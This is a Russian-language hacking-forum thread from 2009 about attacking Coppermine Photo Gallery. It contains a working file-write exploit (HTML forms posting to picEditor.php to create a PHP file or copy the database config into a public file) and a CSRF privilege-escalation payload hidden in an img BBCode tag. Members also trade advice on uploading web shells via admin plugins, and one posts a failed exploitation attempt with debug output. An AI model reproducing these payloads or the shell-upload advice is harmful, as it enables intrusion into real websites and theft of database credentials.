Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.01.2009, 01:49
|
|
Новичок
Регистрация: 28.12.2008
Сообщений: 3
Провел на форуме:
7775
Репутация:
0
|
|
а файлики не качаюцца  |
|
|
10.02.2009, 17:21
|
|
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936
Репутация:
24
|
|
Coppermine Photo gallery - Remote PHP File Upload 1.4.19
PHP код:
<?php
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
?>
|
|
|
|
03.03.2009, 11:42
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC
csrf-инъекция в BB-теге img (комментарии к фото):
Код:
[img*]http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img*]
где [ID]- id атакующего
как только администратор посетит страницу с кодом, атакующий получит администраторские привилегии. Так-то!
//by Juri Gianni aka yeat - staker[at]hotmail[dot]it
|
|
|
|
13.03.2009, 12:18
|
|
Новичок
Регистрация: 08.09.2005
Сообщений: 6
Провел на форуме:
154855
Репутация:
0
|
|
Как я могу залить шелл ?
Привет,
Я имею admin на Coppermine Photo Gallery 1.4.14 modpack v1 (stable). Как я могу залить шелл ?
|
|
|
|
13.03.2009, 13:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
vector, два поста выше. Если не понял - стучи в аську 674542, помогу.
|
|
|
|
01.04.2009, 20:33
|
|
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253
Репутация:
7
|
|
1.4.21 (stable)
1.4.21 (stable) - есть админка, можно как-нить шелл залить?
|
|
|
|
05.04.2009, 08:21
|
|
Познающий
Регистрация: 05.04.2005
Сообщений: 46
Провел на форуме:
77505
Репутация:
1
|
|
Сообщение от number0
Coppermine Photo gallery - Remote PHP File Upload 1.4.19
PHP код:
<?php
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
?>
Эту хрень как юзать то, какие пути куда ставить???
|
|
|
|
05.04.2009, 10:07
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Cохраняешь как пхп и запускаешь...
|
|
|
|
13.04.2009, 18:23
|
|
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253
Репутация:
7
|
|
1.4.21 (stable) - есть админка, можно как-нить шелл залить?
Снимаю вопрос, можно через плагины =)
|
|
|
|
17.04.2009, 00:44
|
|
Познающий
Регистрация: 14.07.2005
Сообщений: 62
Провел на форуме:
348453
Репутация:
6
|
|
Пытался проэксплотировать Coppermine Photo gallery - Remote PHP File Upload 1.4.19 на локалхосте. Скрипт после отправки из хтмл формы пишет "Произошла ошибка при обращении к базе данных.". Приведу немного более детальную информацию:
Код:
<form action="http://test1.ru/Gallery/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/test.txt"
method=post>
<input name="save" value=1>
<input name="keysToSkip" value=1>
<input name="_GET" value=1>
<input name="_REQUEST" value=1>
<input type=submit>
</form>
</html>
Получаю:
Произошла ошибка при обращении к базе данных.
Код:
While executing query "UPDATE cpg14x_pictures
SET pheight = ,
pwidth = ,
filesize = 0,
total_filesize = 0
WHERE pid = '-1'" on 0
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
pwidth = ,
' at line 2
Отладочная информация:
Код:
USER:
------------------
Array
(
[ID] => 7a90b61ad582429ba6863b711ab83959
[am] => 1
[lang] => russian
)
==========================
USER DATA:
------------------
Array
(
[user_id] => 1
[user_name] => 111
[groups] => Array
(
[0] => 1
)
[disk_max] => 0
[disk_min] => 0
[can_rate_pictures] => 1
[can_send_ecards] => 1
[ufc_max] => 3
[ufc_min] => 3
[custom_user_upload] => 0
[num_file_upload] => 5
[num_URI_upload] => 3
[can_post_comments] => 1
[can_upload_pictures] => 1
[can_create_albums] => 1
[has_admin_access] => 1
[pub_upl_need_approval] => 0
[priv_upl_need_approval] => 0
[group_name] => Administrators
[upload_form_config] => 3
[group_quota] => 0
[can_see_all_albums] => 1
[group_id] => 1
)
==========================
Queries:
------------------
Array
(
[0] => SELECT extension, mime, content, player FROM cpg14x_filetypes; (0.006s)
[1] => select * from cpg14x_plugins order by priority asc; (0.003s)
[2] => delete from `cpg`.cpg14x_sessions where time<1239905435 and remember=0; (0.011s)
[3] => delete from `cpg`.cpg14x_sessions where time<1238699435; (0.003s)
[4] => select user_id from `cpg`.cpg14x_sessions where session_id = '31d9cb0a10390819fbc0e3a1f7ffc37b' (0.002s)
[5] => select user_id as id, user_password as password from `cpg`.cpg14x_users where user_id=1 (0.007s)
[6] => SELECT u.user_id AS id, u.user_name AS username, u.user_password AS password, u.user_group+100 AS group_id FROM `cpg`.cpg14x_users AS u INNER JOIN `cpg`.cpg14x_usergroups AS g ON u.user_group=g.group_id WHERE u.user_id='1' (0.005s)
[7] => SELECT user_group_list FROM `cpg`.cpg14x_users AS u WHERE user_id='1' and user_group_list <> ''; (0.01s)
[8] => SELECT MAX(group_quota) as disk_max, MIN(group_quota) as disk_min, MAX(can_rate_pictures) as can_rate_pictures, MAX(can_send_ecards) as can_send_ecards, MAX(upload_form_config) as ufc_max, MIN(upload_form_config) as ufc_min, MAX(custom_user_upload) as custom_user_upload, MAX(num_file_upload) as num_file_upload, MAX(num_URI_upload) as num_URI_upload, MAX(can_post_comments) as can_post_comments, MAX(can_upload_pictures) as can_upload_pictures, MAX(can_create_albums) as can_create_albums, MAX(has_admin_access) as has_admin_access, MIN(pub_upl_need_approval) as pub_upl_need_approval, MIN( priv_upl_need_approval) as priv_upl_need_approval FROM cpg14x_usergroups WHERE group_id in (1) (0.002s)
[9] => SELECT group_name FROM cpg14x_usergroups WHERE group_id= 1 (0.002s)
[10] => update `cpg`.cpg14x_sessions set time='1239909035' where session_id = '31d9cb0a10390819fbc0e3a1f7ffc37b' (0.002s)
[11] => SELECT user_favpics FROM cpg14x_favpics WHERE user_id = 1 (0.026s)
[12] => DELETE FROM cpg14x_banned WHERE expiry < '2009-04-16 19:10:36' (0.03s)
[13] => SELECT * FROM cpg14x_banned WHERE (ip_addr='127.0.0.1' OR ip_addr='127.0.0.1' OR user_id=1) AND brute_force=0 (0.002s)
[14] => UPDATE cpg14x_pictures
SET pheight = ,
pwidth = ,
filesize = 0,
total_filesize = 0
WHERE pid = '-1' (0.001s)
[15] => SELECT COUNT(*) FROM cpg14x_pictures WHERE approved = 'NO' (0.026s)
)
==========================
GET :
------------------
Array
(
[img_dir] => include/config.inc.php
[CURRENT_PIC] => Array
)
==========================
POST :
------------------
Array
(
[save] => 1
[keysToSkip] => 1
[_GET] => 1
[_REQUEST] => 1
)
==========================
VERSION INFO :
------------------
Код:
PHP version: 5.2.4 - OK
------------------
mySQL version: 5.0.45-community-nt
------------------
Coppermine version: 1.4.19(stable)
==========================
Module: GD
------------------
GD Version: bundled (2.0.34 compatible)
FreeType Support: 1
FreeType Linkage: with freetype
T1Lib Support: 1
GIF Read Support: 1
GIF Create Support: 1
JPG Support: 1
PNG Support: 1
WBMP Support: 1
XPM Support:
XBM Support: 1
JIS-mapped Japanese Font Support:
==========================
Module: mysql
------------------
MySQL Supportenabled
Active Persistent Links 0
Active Links 1
Client API version 5.0.45
==========================
Module: zlib
------------------
ZLib Support enabled
Stream Wrapper support compress.zlib://
Stream Filter support zlib.inflate, zlib.deflate
Compiled Version 1.2.3
Linked Version 1.2.3
==========================
Server restrictions (safe mode)?
------------------
Directive | Local Value | Master Value
safe_mode | Off | Off
safe_mode_exec_dir | no value | no value
safe_mode_gid | Off | Off
safe_mode_include_dir | no value | no value
safe_mode_exec_dir | no value | no value
sql.safe_mode | Off | Off
disable_functions | no value | no value
file_uploads | On | On
include_path | .;/usr/local/php5/PEAR | .;/usr/local/php5/PEAR
open_basedir | no value | no value
==========================
email
------------------
Directive | Local Value | Master Value
sendmail_from | me@localhost.com | me@localhost.com
sendmail_path | \usr\sbin\sendmail*-t*-i | \usr\sbin\sendmail*-t*-i
SMTP | localhost | localhost
smtp_port | 25 | 25
==========================
Size and Time
------------------
Directive | Local Value | Master Value
max_execution_time | 30 | 30
max_input_time | 60 | 60
upload_max_filesize | 2M | 2M
post_max_size | 8M | 8M
==========================
Page generated in 1.545 seconds - 16 queries in 0.138 seconds - Album set : ; Meta set: ;
Заметки
Код:
\include\init.inc.php
Notice line 56: Array to string conversion
\picEditor.php
Notice line 115: Undefined variable: img_dir
Notice line 118: Undefined index: id
Notice line 123: Undefined index: newimage
Notice line 148: Undefined variable: imgObj
Notice line 148: Trying to get property of non-object
Notice line 149: Undefined variable: imgObj
Notice line 149: Trying to get property of non-object
Notice line 150: Undefined variable: CURRENT_PIC
Notice line 150: Undefined variable: CURRENT_PIC
Notice line 151: Undefined variable: CURRENT_PIC
Notice line 151: Undefined variable: CURRENT_PIC
Notice line 155: Undefined variable: CURRENT_PIC
Notice line 155: Undefined variable: CURRENT_PIC
Warning line 155: copy() [function.copy]: The first argument to copy() function cannot be a directory
Warning line 163: unlink(albums/normal_) [function.unlink]: No such file or directory
Warning line 168: filesize() [function.filesize]: stat failed for albums/thumb_
\include\picmgmt.inc.php
Warning line 165: getimagesize(albums/edit/) [function.getimagesize]: failed to open stream: No such file or directory
Прошу помочь разобратся в ошибке. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
